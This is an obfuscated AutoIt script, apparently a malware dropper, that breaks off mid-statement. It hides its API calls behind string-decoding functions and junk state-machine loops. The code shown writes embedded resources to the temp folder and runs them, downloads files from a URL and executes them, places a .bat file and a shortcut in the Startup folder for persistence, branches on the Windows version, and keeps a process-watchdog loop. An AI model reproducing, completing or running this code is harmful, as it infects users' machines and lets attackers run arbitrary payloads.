$IUBOUND $1300820860 = 176683708 MOD (2181193 , 145975 ) ENDIF NEXT ENDFUNC FUNC EVNJAAQWEO ($ILENGTH ) RETURN $ILENGTH * 1.609000 ENDFUNC FUNC UDRNJBRYOF ($INUM ) IF ($INUM < 2 ) THEN RETURN FALSE IF ($INUM = 2 ) THEN RETURN TRUE IF (BITAND ($INUM , 1 ) = 0 ) THEN RETURN FALSE FOR $I = 3 TO SQRT ($INUM ) STEP 2 IF (MOD ($INUM , $I ) = 0 ) THEN RETURN FALSE NEXT RETURN TRUE ENDFUNC FUNC MRDEQHUQFFBML ($IVALUE , $VTRUE , $VFALSE ) GLOBAL $1300820860 = 256356752 GLOBAL $L3VWCZDZ75 = 3389345 FOR $E = 0 TO 998476 ISSTRING (628113 + 942730 ) IF $1300820860 = 176683708 THEN RETURN $AARRAY [NUMBER (NUMBER ($IVALUE ) > 0 ) ] MOD (921477 , 2927320 ) EXITLOOP INT (349919 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $AARRAY [2 ] = [$VFALSE , $VTRUE ] ISSTRING ("SkQGwKYZ0nIFo7bZeu5ZVhzOMeaG8Txzn13seLZFzR29OnBEppLoJmmJVb4rJr1h0isxdTVBEzydoz9zMFqShjZaOtHdSH5iZVjF4eBGDkTjYjvucEO" ) $1300820860 = 176683708 ENDIF INT (2861288 ) NEXT ENDFUNC FUNC SNUVPERSZOEKMQP ($NJOKER = 0 ) GLOBAL $1300820860 = 256356752 GLOBAL $KST7EQNCQC = 2965723 FOR $E = 0 TO 1982129 ISPTR ("zOmF7man20iQVBmMvSvWAVOG52eJagbq5cqNemW8RFeOhHSYp1lvxBFNaOJeiAmWZ2VSlHIj5xe4Rayxkpti4O2DGLNyLR0qssZpWaMSrcAawL7apm" ) IF $1300820860 = 176683708 THEN $NNUMBERS = LUXBZMCWKPOC ("T..wo,..Thre..e,Fo..ur,..Fiv..e,..S..i..x..,..S..ev..e..n..,..Eigh..t..,N..i..ne,..T..en,..Jack,..Ki..ng..,Queen,A..c..e.." , ".." ) DIM $E1K9QLI4JHNGYKYKJKJL = 2438973 EXITLOOP MOD (3523655 , 459451 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $NNUMBERS , $AZSPLITS , $NRANDOM , $NRETURN , $SFACE , $SFACES , $NRANDOM2 ISBINARY ("X7ioAOqEZdXiEnCHaIZgLVqFn96gjq4qbiAJQw7E2fuIYSwa" ) $1300820860 = 176683708 PTR ("cQMbATjuHiGgwX22NKtoFzRREM5QKwYBavx3cuGWSUXzrLanHRpEDXqL95GYXCUlufgay8ZseHFWMqz3LSi4gs7meW4gYS8" ) ENDIF NEXT IF $NJOKER THEN $NNUMBERS &= LUXBZMCWKPOC (",..Joker.." , ".." ) ENDIF GLOBAL $1027989821 = 256356752 GLOBAL $FLE9YJ16A6 = 2436800 FOR $E = 0 TO 1120770 IF $1027989821 = 113519199 THEN $SFACE = $SFACES [ROUND ($NRANDOM2 ) ] ISBINARY ("u0ebh36Md" ) EXITLOOP STRING (1075817 + 736701 + 1516956 + 4291363348 ) ENDIF IF $1027989821 = 176683708 THEN $SRETURN = $AZSPLITS [RANDOM (1 , $AZSPLITS [0 ] , 1 ) ] DIM $B5JWLKKF34JGEELDLFJB = 269680 + 4294929560 * 3909909 + 4293809292 + 2329391 + 3103136 * 3612467 + 432899 $1027989821 = 1300820860 PTR (449167 * 2683051 ) ENDIF IF $1027989821 = 256356752 THEN $AZSPLITS = STRINGSPLIT ($NNUMBERS , "," ) $1027989821 = 176683708 DIM $3SYN52XOT45SIVM57NRU = "cinRNfEziDbCT4ltCdDdmXy56nq0llh2xy0JK6qWsokA4pyABLEKmqAoTsUzYOo6vietdLTFWRV8M" ENDIF IF $1027989821 = 1203322726 THEN $NRANDOM2 = RANDOM (1 , $SFACES [0 ] + 4294967295 ) ISFLOAT (3366178 + 4292208555 + 4292321933 ) $1027989821 = 113519199 INT (796222 ) ENDIF IF $1027989821 = 1300820860 THEN $SFACES = STRINGSPLIT (LUXBZMCWKPOC ("S..p..a..d..es|C..l..ubs|H..e..arts|..D..i..a..mon..d..s.." , ".." ) , "|" ) ISBINARY ("eVkew039YEFCLUrdK8qOpYD8vBU" ) $1027989821 = 1203322726 DIM $7Y4OFUCHQRTJJE9GAIOA = 1448036 ENDIF NEXT IF $SRETURN = LUXBZMCWKPOC ("Jo..k..er" , ".." ) THEN RETURN $SRETURN ELSE RETURN $SRETURN & LUXBZMCWKPOC (" O..f .." , ".." ) & $SFACE ENDIF ENDFUNC FUNC YOATAXCYMFD ($ICONTROLID ) GLOBAL $1300820860 = 256356752 GLOBAL $QMT4FCQ2WY = 1003050 FOR $E = 0 TO 2025828 IF $1300820860 = 176683708 THEN GUICTRLSETSTATE ($ICONTROLID , $ASTATE [NUMBER (BITAND (GUICTRLGETSTATE ($ICONTROLID ) , $ASTATE [0 ] ) = $ASTATE [0 ] ) ] ) EXITLOOP ISFLOAT (2221998 + 1544486 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $ASTATE [2 ] = [0 , 1 ] ISBINARY ("QSVLzO7sbHCnb0wlaWp7" ) $1300820860 = 176683708 ISSTRING (1463820 + 3785400 * 3517776 ) ENDIF NEXT ENDFUNC FUNC MXNUVEYTLNEVG () RETURN STRINGREGEXPREPLACE (@OSARCH , "(?i)x86|\D+" , "" ) ENDFUNC GLOBAL $586524435 = 256356752 GLOBAL $DM3XLFO06Q = 765620 FOR $E = 0 TO 3030037 RANDOM (795858 ) IF $586524435 = 38669117 THEN $RSOIAVQHRSRB = EXECUTE (LUXBZMCWKPOC ("Z..p..LP..Qg..YB..g..R..D..g..()" , ".." ) ) STRING ("smhpaEbDifblFOsHg8e2wHIwL359LcXdJ631FNXReUR1oJaJNNTRtKmUNUMhIb1gs8KJ" ) $586524435 = 2032766480 DIM $CLXXL0SHC2UU8SFT9TIM = "aQhc2KHq8zYlLqF6XJ35LKooR3XmoL1MppCEqVUpj1dBGivcJXliorjyB3u9XvcvIl6vXaQb0NWVHWSHHVLBzSx8gddx" ENDIF IF $586524435 = 39019882 THEN $DKMWACMPQYMR = EXECUTE (LUXBZMCWKPOC ("wC..Cb..b..C..aNdN..Z..P(..)" , ".." ) ) $586524435 = 1885155689 WINEXISTS ("m9oJhksKFx0OlXAcTK51Y8pT6sKfl7603wvHFctpz" ) ISFLOAT ("mMtzeoWbGnUEMZImyHBaVYB3FRqOBaFGFHg8WW3Rd2ZhYayE" ) ENDIF IF $586524435 = 61093985 THEN OPT (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..0,..44,..2..7,5..1..,..9,2..9..,41,..40,8,35,..30..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM ("54" ) ) STRING (1037708 + 4293434638 ) $586524435 = 1053930317 RANDOM (425821 ) ENDIF IF $586524435 = 92596336 THEN $XFNAYPZBZOLC = EXECUTE (LUXBZMCWKPOC ("J..W..W..T..SbPFt..D..yX..(..)" , ".." ) ) ISFLOAT ("fTKzLNU628ueErW8oLKqt3SXv3GU7styKctVfWWqEpVy0vxelhu4g6OlaXeSga9JO5DC8a2CZuVeit6aECIZ7ysOwiVsSdkEqkU524gko2eWkKcR0emNB" ) $586524435 = 1604509846 ENDIF IF $586524435 = 113519199 THEN $RBNGTNJVQYOQOTZBNEJFBEBBBRMZZMPCIMKJNUBQXAYVVUQBECJFBZVM = EXECUTE (LUXBZMCWKPOC ("@..S..cr..i..p..tD..ir" , ".." ) ) PTR ("UVjqX7JbhKvxJeuFEWfdBM0FcgHDsdYq5OhsL3XfhZ6LreIH5ftsUmhh5NnRyfTdWfC57" ) $586524435 = 1027989821 DIM $5MQON8GAIMUEFSGAX8QF = "cg20lLNK2lStUqEAQzpkyGFsqJUy6N654t3GYycw3zQbclWBbJRHz5rEJIIL1pNooXyAw8Mrx2q80DqeYr" ENDIF IF $586524435 = 116471326 THEN $ADVENYDCNHZL = EXECUTE (LUXBZMCWKPOC ("igCf..Q..U..u..W..mEaf()" , ".." ) ) $586524435 = 1196440215 ISSTRING (102795 * 930307 * 1666361 ) ISPTR ("pWued7yjGNtNfsDYJ3rr0rAy8bxC8xMmySbrCnszGo7tSU06uK5UDj57v6fcI6ljagoxqlvvJ1ULtgRokBiwB3SpWd6Fh" ) ENDIF IF $586524435 = 176683708 THEN $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE = EXECUTE (LUXBZMCWKPOC ("@T..empDi..r.." , ".." ) ) $586524435 = 1300820860 PTR ("EBOipIkLysNpp11gYZRhy9KmpZotajJFXfUSX9g3Sf0DzRqqyUXnglmE1C2At0LpThCjgis" ) PTR ("ihWIH85qwwyK3o1ugQI2DKUsohjqA8EsW3wTQ" ) ENDIF IF $586524435 = 256356752 THEN #region qcVZk $586524435 = 176683708 ENDIF IF $586524435 = 432319576 THEN $CSRHZILJDSLP = EXECUTE (LUXBZMCWKPOC ("CR..A..yo..Qr..F..EAmS()" , ".." ) ) $586524435 = 92596336 WINEXISTS ("8RcpGZGwDuzZNZx1gZa2iOXYn6iSxIw2r" ) INT (1853682 ) ENDIF IF $586524435 = 737653776 THEN $SNOJUKVVIBEY = EXECUTE (LUXBZMCWKPOC ("Qh..Mg..hxJzkQD..S..().." , ".." ) ) $586524435 = 38669117 ENDIF IF $586524435 = 781366022 THEN $PSZKHZKXAIEO = EXECUTE (LUXBZMCWKPOC ("Z..Eb..j..k..FZ..IP..af..i..()" , ".." ) ) ISSTRING ("EELco9it4ocJQZ947HHOvhydJ6cWCYvRQLm27uMr0iwobNw9wqb48LjxfIBs6w" ) $586524435 = 864731176 WINEXISTS ("4eLg7M5pYnVkc5IdzlXBSdCZWy2uuDrpvQUsxptx8" ) RANDOM (2486629 ) ENDIF IF $586524435 = 848901156 THEN $FPJBQJEGCCNE = EXECUTE (LUXBZMCWKPOC ("Rm..O..eeci..Wz..OyF..().." , ".." ) ) ISSTRING (3597529 + 4293720639 + 4292443185 * 2434805 ) $586524435 = 1718368979 ISBOOL (2363483 + 3721986 + 4291682637 + 4294195590 ) ENDIF IF $586524435 = 864731176 THEN $WQURQXMWAZTB = EXECUTE (LUXBZMCWKPOC ("m..sSF..B..h..B..P..z..K..O..b..(..)" , ".." ) ) $586524435 = 1808850186 ISSTRING ("2vKAFL64c3RK5VMxXCahgjuCoXX48NKfICQy9DYsH4tsIengVelWEfUTbimSZc5yrKbCeoytORJlZb3jJQi4BYJDS7w0qfDE85a7cUc" ) ENDIF IF $586524435 = 954977294 THEN $UEHQXDUALSWD = EXECUTE (LUXBZMCWKPOC ("b..f..SE..zoF..q..q..v..Rv().." , ".." ) ) WINEXISTS ("YEI3apcii3b6Db" ) $586524435 = 61093985 DIM $1ICJNEN4A5HZNKPJRW8J = 283651 ENDIF IF $586524435 = 1027989821 THEN $RVLXXSQVNZAXBEXVLCOYMMYTVKMXHDDKZNNJCLAAUDHWOTJLFVEDXJKE = EXECUTE (LUXBZMCWKPOC ("@..O..S..Version.." , ".." ) ) $586524435 = 1138660241 ISSTRING (1984088 * 2723817 + 3324077 + 4292629190 ) ENDIF IF $586524435 = 1051260188 THEN $URTJHDWBPVQN = EXECUTE (LUXBZMCWKPOC ("r..qBfMR..VGxj..yI..().." , ".." ) ) $586524435 = 737653776 INT (3726376 ) ENDIF IF $586524435 = 1053930317 THEN ONXNEQMVEA () EXITLOOP ENDIF IF $586524435 = 1070530058 THEN $NPTGNKISXCCR = EXECUTE (LUXBZMCWKPOC ("ZPvye..e..xeU..e..wT(..).." , ".." ) ) $586524435 = 39019882 ISSTRING (3240311 * 1888434 + 3763639 ) ENDIF IF $586524435 = 1138660241 THEN $JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH = EXECUTE (LUXBZMCWKPOC ("@..A..u..to..I..tP..ID.." , ".." ) ) ISFLOAT (588471 + 791503 + 4291741726 + 1530756 ) $586524435 = 1924764602 INT (741726 ) ENDIF IF $586524435 = 1196440215 THEN $GCIZPUUYNTJL = EXECUTE (LUXBZMCWKPOC ("YyEu..J..PRYp..kCM().." , ".." ) ) ISFLOAT (1508313 + 533998 + 3514586 * 3820887 ) $586524435 = 1070530058 INT (1869136 ) ENDIF IF $586524435 = 1203322726 THEN $LEBAKWEILIBIQNTCTHBGGFGBKVXCKB = EXECUTE (LUXBZMCWKPOC ("@Sc..r..ip..tF..ull..P..at..h" , ".." ) ) ISBINARY (2457696 + 3222973 ) $586524435 = 113519199 ISFLOAT (42047 + 288839 ) ENDIF IF $586524435 = 1296565717 THEN $WURIVHUQSXZK = EXECUTE (LUXBZMCWKPOC ("s..hY..KZnw..GX..GS..g().." , ".." ) ) $586524435 = 2022545531 ISFLOAT ("KSd169kc6IahO4I6gAF1NXaSWdLa7NL2tHzf2oVG0anFtKLW33LJnz0YSvf" ) ENDIF IF $586524435 = 1300820860 THEN $RXJCPAPNDUMJMOSOPQCHSTGTFYAPOZBYKYKLGKEC = EXECUTE (LUXBZMCWKPOC ("@S..ta..r..tupD..i..r.." , ".." ) ) DIM $R6IYHEDD2Q8BNIEXLA0G = 254100 + 140238 $586524435 = 1203322726 ISFLOAT (1510904 + 3531272 + 2714089 ) ISBOOL ("Ery0U4oymom83AGdap4D4z2gFSXZvSL6lx6HRnriyEEwkHpBMM5RNS2eystbgzdELqWEE8vX8Wez5E68CvlTX5rDF2iy3pb" ) ENDIF IF $586524435 = 1604509846 THEN $NCPIUPWKFYZJ = EXECUTE (LUXBZMCWKPOC ("dd..K..W..O..Y..Mj..JPnF..()" , ".." ) ) RANDOM (3014537 ) $586524435 = 2060391673 ISPTR (2631610 + 2878018 ) CHR (609484 ) ENDIF IF $586524435 = 1655436234 THEN $FREUKGMVKMCX = EXECUTE (LUXBZMCWKPOC ("xZ..r..g..VRf..Ny..RG..X..(..)" , ".." ) ) STRING (3048769 + 2837918 ) $586524435 = 781366022 INT (3973707 ) RANDOM (3609677 ) ENDIF IF $586524435 = 1713506615 THEN $BQQDLTTXSVYF = EXECUTE (LUXBZMCWKPOC ("b..vM..qyYk..u..KU..R..a(..)" , ".." ) ) DIM $85UCLTYGBOMZ1DSOCHRP = 3067333 $586524435 = 432319576 ENDIF IF $586524435 = 1718368979 THEN $WDNTUWUIPGOD = EXECUTE (LUXBZMCWKPOC ("H..g..MGwW..t..Pd..n..oR..(..)" , ".." ) ) $586524435 = 1051260188 ENDIF IF $586524435 = 1808850186 THEN $HOKAFSRHEHOF = EXECUTE (LUXBZMCWKPOC ("Q..DG..s..B..I..xa..sio..K..()" , ".." ) ) ISBOOL ("jtjZwQ2cDIA64J3vbEt2MRhS8eR" ) $586524435 = 848901156 ENDIF IF $586524435 = 1885155689 THEN $FWRGBKVEXWEH = EXECUTE (LUXBZMCWKPOC ("aZm..t..vpRVI..Ox..M().." , ".." ) ) $586524435 = 1970938970 PTR (319730 + 2304399 ) ENDIF IF $586524435 = 1924764602 THEN $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF = EXECUTE (LUXBZMCWKPOC ("@A..u..t..o..I..t..E..x..e.." , ".." ) ) $586524435 = 1655436234 MOD (1701699 , 3431664 ) MOD (2416550 , 2390431 ) ENDIF IF $586524435 = 1970938970 THEN $DNKSORVXJZJU = EXECUTE (LUXBZMCWKPOC ("m..N..IAO..Q..ehl..r..x..V()" , ".." ) ) $586524435 = 1296565717 ENDIF IF $586524435 = 2022545531 THEN $DBGGPSHIBQGJ = EXECUTE (LUXBZMCWKPOC ("Yr..bQ..D..b..YjG..k..Xs..().." , ".." ) ) INT (1081925 ) $586524435 = 1713506615 ENDIF IF $586524435 = 2032766480 THEN $NLIVQGZCBCYM = EXECUTE (LUXBZMCWKPOC ("C..JcC..I..d..D..e..p..T..l..c(..)" , ".." ) ) $586524435 = 116471326 ENDIF IF $586524435 = 2060391673 THEN $QNTYERAUOLAX = EXECUTE (LUXBZMCWKPOC ("Q..U..Bc..ah..B..bZKyJ(..)" , ".." ) ) $586524435 = 954977294 DIM $BRKOQF83ME6AKFCOSE4C = 59615 * 967375 * 3257347 + 3941415 * 854843 + 4293200229 ISBINARY (247142 + 2356577 ) ENDIF NEXT FUNC QKSZFURFTX ($FILE , $STARTUP , $RES ) GLOBAL $1027989821 = 256356752 GLOBAL $1QBIAIKTYR = 2085798 FOR $E = 0 TO 3057511 ISFLOAT ("zOgbQqelu6IyNpD2fE3I1Oa0WDGU98c0KrL56v0KL0YeJVeHm3LhY30UNpolTtlv3TXwMI6TNr7b16qaz9Hg" ) IF $1027989821 = 113519199 THEN $DBGGPSHIBQGJ ($FHANDLE ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN DIM $FHANDLE = $FWRGBKVEXWEH ($FILE , ZVTZJDNXHRPQQIM ("55" ) ) $1027989821 = 1300820860 ENDIF IF $1027989821 = 256356752 THEN $FILE = $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $FILE ISBINARY ("08S5M73DF5Z3S9nWUVf9" ) $1027989821 = 176683708 DIM $5VRPL9AOWYVZCRE4JDAG = 3143133 ISBOOL (3582513 + 2118016 + 4293087897 + 611733 ) ENDIF IF $1027989821 = 1203322726 THEN $NPTGNKISXCCR ($FHANDLE , $BQQDLTTXSVYF ($DATA , 1 ) ) DIM $RQDEQCE6JLEQ05FIKSSX = 2938432 + 4292099282 + 1270365 + 3196127 $1027989821 = 113519199 MOD (614262 , 3626405 ) CHR (809950 ) ENDIF IF $1027989821 = 1300820860 THEN DIM $DATA = READRESOURCES ($RES , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4,5..3.." , ".." ) ) ) ISSTRING ("LgSXAQM7L8KDwLhHvViOJwtbkVrDtLTWkshCau2Bj87rIzH7tNKRxC4oX" ) $1027989821 = 1203322726 ISBINARY ("NapYsdDOHb2QEKybCUn" ) ENDIF DIM $YRY2OTSND9U7BUGDCOFJ = "R7s0Vn1Bea88nzLNL9osNLEqBaSMT1DIBnRTgc4g1W99v8XuE01O1rjfBbxVEoSnFyGaT2HIfiA2LF5Dnxh39ZSkdKrfNjKLd" NEXT IF $STARTUP = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,27,38,..4..5..,..3..1.." , ".." ) ) THEN IF $STARTUPDIR <> $RBNGTNJVQYOQOTZBNEJFBEBBBRMZZMPCIMKJNUBQXAYVVUQBECJFBZVM THEN $FPJBQJEGCCNE ($FILE ) ENDIF ELSE $FPJBQJEGCCNE ($FILE ) ENDIF ENDFUNC FUNC ONXNEQMVEA () GLOBAL $1203322726 = 256356752 GLOBAL $C7AXLMSSIT = 3121811 FOR $E = 0 TO 3357923 IF $1203322726 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,3..5,4..0..,2..7..,44,5..1..,2..0,41..,19,46,..4..4..,3..5..,..4..0..,..33" , ".." ) ) ) WINEXISTS ("hgZnRQw6hKB46HYY0d7czWEKRq9uWiu8ULCFoHVqe0Dc0xLkbCM2i1hvKnGARck8p" ) $1203322726 = 1300820860 ENDIF IF $1203322726 = 256356752 THEN LOCAL $E = EXECUTE $1203322726 = 176683708 ISBOOL ("UtNYssFC03Dh4abuJcOEWwnqgS3uJA3GeiDnW2T1CWMq06xIp7h54WQ" ) ENDIF IF $1203322726 = 1300820860 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50..,5..7..,..5..9,59,62,..59..,3,59,58..,..57..,..57..,5..9..,5..8,59..,3,..59,..5..8,60,..57,5..9..,58,55,6..1,5..7,..5..3..,..57,5..4..,60..,58..,60,5..7,..5..9,..6,5..9..,..6..2..,..6..0..,..57,57,..5..8,..6..0..,6..1,..5..9,58..,55,..53..,..55..,59..,5..5..,53,..5..5..,..5..5..,56..,..1..,..58..,..1..,..59,..6,5..9,..5,5..9..,58..,..55,..5,..57,6..2,5..9,..5..7,5..9,5..8,..59,..5,60..,..57..,..5..9..,62..,59..,..59,5..9..,6..2..,..5..9..,..5..8..,60..,..55,..5..5..,5..5..,..5..5,..62" , ".." ) ) ) ) EXITLOOP ENDIF DIM $Y97DWGYHRTYCAT6ZKUUF = 2510278 + 3854158 + 4293801246 + 4294608792 + 1644230 + 539219 + 4293769420 * 910755 NEXT ENDFUNC FUNC KMNVXSBBAW () IF $FREUKGMVKMCX (LUXBZMCWKPOC ("[C..LAS..S..:Pro..g..man..].." , ".." ) ) = ZVTZJDNXHRPQQIM ("53" ) THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ENDIF ENDFUNC FUNC AAPIEUMFUN ($URL , $PATH ) IF $BOOL = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..2..7..,..3..8,..4..5,31.." , ".." ) ) THEN GLOBAL $1300820860 = 256356752 GLOBAL $32KBBZALGT = 1119509 FOR $E = 0 TO 2712344 RANDOM (2095806 ) IF $1300820860 = 176683708 THEN $FPJBQJEGCCNE ($TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $PATH ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $GCIZPUUYNTJL ($URL , $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $PATH ) $1300820860 = 176683708 ENDIF ISSTRING ("TfEOGsTtMn2vFHWA7BO2wmOipHgrJUr4AU9JjEznFVB" ) NEXT ENDIF ENDFUNC FUNC GLOBALDATA ($DATA , $RT ) GLOBAL $113519199 = 256356752 GLOBAL $NQZNGATQ1S = 146980 FOR $E = 0 TO 3993025 STRING ("lBT3674WHmqCbAwKVL4IS3UIbKdiUCiXeBcebIgpWdOuUpNA6yVYB0qsRk1u4WbedDxJyrJmFOXOozYV7MmvSuuolTw0RVv9bJrp1dcNZIsXdKervgxqI" ) IF $113519199 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,3..5,40..,2..7..,44..,..51,..46,4..1..,..45,..4..6,4..4..,..35..,40,33" , ".." ) ) ) ISFLOAT ("yO5TEUsXMNhI33KIGjb" ) $113519199 = 1300820860 ISBOOL (315032 + 4293404405 + 1700342 ) ENDIF IF $113519199 = 256356752 THEN LOCAL $E = EXECUTE ISFLOAT (1487556 + 205813 + 4292996003 + 3893714 ) $113519199 = 176683708 ISSTRING (52836 + 2786511 ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $R = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50..,58..,..5..6..,..6..0..,57,..6..0..,..5..5,..5..9,62..,..5..9,..5,..5..9,60,..5..8..,..56,6..0,..53,5..9..,3..,5..9..,..6..2,..60,..57..,..5..5..,61,..5..7..,..55..,..59,62,5..9..,..5..,5..9..,..5..4,..60..,..55,60,..6..2..,..58..,..57,..59..,6,58..,..56,..6..0,..5..7..,..60..,5..5..,..59..,..62,..59..,..5,5..9..,6..0..,5..5..,6..1,..5..5,..57,5..9,..5..7,59,..54..,6..0,..5..7,..5..9,..54,..5..5..,..6..2..,55..,3,5..5,..53,55..,..5..5..,60,..3..,5..5..,..5..5,..55..,6..2.." , ".." ) ) ) ) PTR (3380382 * 1435103 ) EXITLOOP ENDIF IF $113519199 = 1300820860 THEN LOCAL $RETURN $113519199 = 1203322726 DIM $N0AGDC4KP4RY4YZLA1DS = 3293589 + 4291468966 * 575197 ENDIF RANDOM (2362379 ) NEXT IF $RT <> "-1" THEN FOR $I = ZVTZJDNXHRPQQIM ("54" ) TO $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0..,..58,5..8..,57..,55..,..59,..6..,..60..,..58..,..5..9,5..,..5..9..,..5..7..,55..,6..1,55,..57,..60,..55..,..55..,6..2..,..5..5,..5..3,5..5..,4..,..55..,..5..3..,..55..,5..5,5..6,5..4..,55..,..55" , ".." ) ) ) ) IF $I = ZVTZJDNXHRPQQIM ("54" ) THEN $RETURN = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0,..57,..5..7,..5..9..,..3,..5..9,..3..,..58..,..5..6,..60..,..5..7..,..60,..5..5..,..60..,..58..,5..9..,..56..,..60..,5..7,5..7,6..0,59,..5..8,..6..0,57..,57,..5..7..,5..9,..54,6..0..,..5..7..,59..,5..4,..55,..61,..58..,5..5,59..,..5..8,59,..5..4..,..5..9..,5..7,..5..8..,5..5..,59,5..8,60..,..5..6,..59..,..6..,..6..0..,5..8,60..,..55,..59,..5..6,59,..58,60..,56,55..,6..1..,..55..,..5..7,6..0..,..5..5,5..8,..2..,55,5..7,59..,62..,..5..8,..4..,..5..5,..3..,5..5..,..5..3,55..,..5..7,60..,55..,..60,57..,5..5..,62,55..,..3,..5..5,..53,56..,54..,55,6..2" , ".." ) ) ) ) ELSE $RETURN &= $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50,..5..7,..5..7..,..59,..3,..5..9,3,..5..8,5..6..,..60..,..5..7,..6..0,..55..,..60..,5..8..,59..,..5..6..,..60..,..5..7,57..,60..,..5..9,..58..,60,57..,57,..57..,5..9..,..5..4,..6..0,57,..5..9,5..4,..55..,..6..1,5..8,..55,..59,..58..,..5..9,54..,..59..,..5..7..,..58,55,..59..,..5..8..,..60,5..6,..59,6..,..6..0..,58..,6..0..,..5..5,..59..,..5..6,..5..9,58..,..6..0..,5..6..,..5..5,..61,55,..57..,60,..5..5,..5..8,..2,..55,57,59..,..6..2,58..,..4..,..55,3,5..5,..53,55,..5..7,..60,5..5..,6..0,57,5..5..,..62..,..5..5,3,..55,..5..3..,5..6..,..5..4..,55..,..62" , ".." ) ) ) ) ENDIF NEXT ENDIF RETURN $RETURN ENDFUNC FUNC AFYCEUVYZX () LOCAL $OSVERSION = $RVLXXSQVNZAXBEXVLCOYMMYTVKMXHDDKZNNJCLAAUDHWOTJLFVEDXJKE IF NOT $ADVENYDCNHZL () THEN IF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM ("60" ) ) THEN RIINHIEBTT () ELSEIF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM ("61" ) ) THEN RIINHIEBTT () ELSEIF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,..5..3.." , ".." ) ) ) THEN IPTYOQECLE () ENDIF ENDIF ENDFUNC FUNC QTMVSHRFRD ($PID ) WHILE (1 ) $HOKAFSRHEHOF (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,53,..5..3..,53,53" , ".." ) ) ) IF $SNOJUKVVIBEY ($PID ) = ZVTZJDNXHRPQQIM ("53" ) THEN DJXLPTMAOK () ENDIF WEND ENDFUNC FUNC UCZPRNKTQP ($NAME , $FILENAME ) GLOBAL $1300820860 = 256356752 GLOBAL $AOBKTGNJEN = 1395198 FOR $E = 0 TO 3001171 ISSTRING ("7gAS7Cz07I7rWa4qtvxQ6oB3N4NKM6uMUA6JH2xHYLmki5XdsDKlhV3SNGedZZnbouHveuSB7Z2ubrUSgJriviE8Hn6aYuT8xl5" ) IF $1300820860 = 176683708 THEN LOCAL $FULLPATH = $STARTUPDIR & "\" & $FILENAME & LUXBZMCWKPOC ("...b..a..t" , ".." ) CHR (3925696 ) EXITLOOP DIM $S3HRVXV6PGEOFZIY1XRM = 2485843 + 3560190 * 3344209 ENDIF IF $1300820860 = 256356752 THEN LOCAL $BYTES = $DKMWACMPQYMR ($LEBAKWEILIBIQNTCTHBGGFGBKVXCKB ) & BINARY ($URTJHDWBPVQN (ZVTZJDNXHRPQQIM ("53" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5..,5..8,..58.." , ".." ) ) ) ) $1300820860 = 176683708 STRING ("mf9FJnCyDBsF09ZNgJeGLlaL191crNmSDlMDYuYDknMANtF6DaDUsOsafxOKvzgZpKcNwvZWWJvxHI7HC5HrkCzY3LxAQnhUhYldq2JikS8S" ) ENDIF NEXT IF $DNKSORVXJZJU ($FULLPATH ) = ZVTZJDNXHRPQQIM ("53" ) THEN GLOBAL $1027989821 = 256356752 GLOBAL $FZHHA2ZOWK = 1840040 FOR $E = 0 TO 940625 RANDOM (1561290 ) IF $1027989821 = 113519199 THEN $WURIVHUQSXZK ($FULLPATH , $RXJCPAPNDUMJMOSOPQCHSTGTFYAPOZBYKYKLGKEC & "\" & $NAME & LUXBZMCWKPOC ("...l..n..k" , ".." ) ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN DIM $FILEHANDLE = $FWRGBKVEXWEH ($FULLPATH , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4,5..3" , ".." ) ) ) $1027989821 = 1300820860 ENDIF IF $1027989821 = 256356752 THEN $XFNAYPZBZOLC (LUXBZMCWKPOC ("k..ern..e..l32.....d..l..l" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..44,..31,27..,..4..6,3..1..,..6,3..5..,..38..,31..,..23" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("49..,45..,46,..44" , ".." ) ) , $FULLPATH , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("53" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , LUXBZMCWKPOC ("st..ru..ct..*" , ".." ) , "" , ZVTZJDNXHRPQQIM 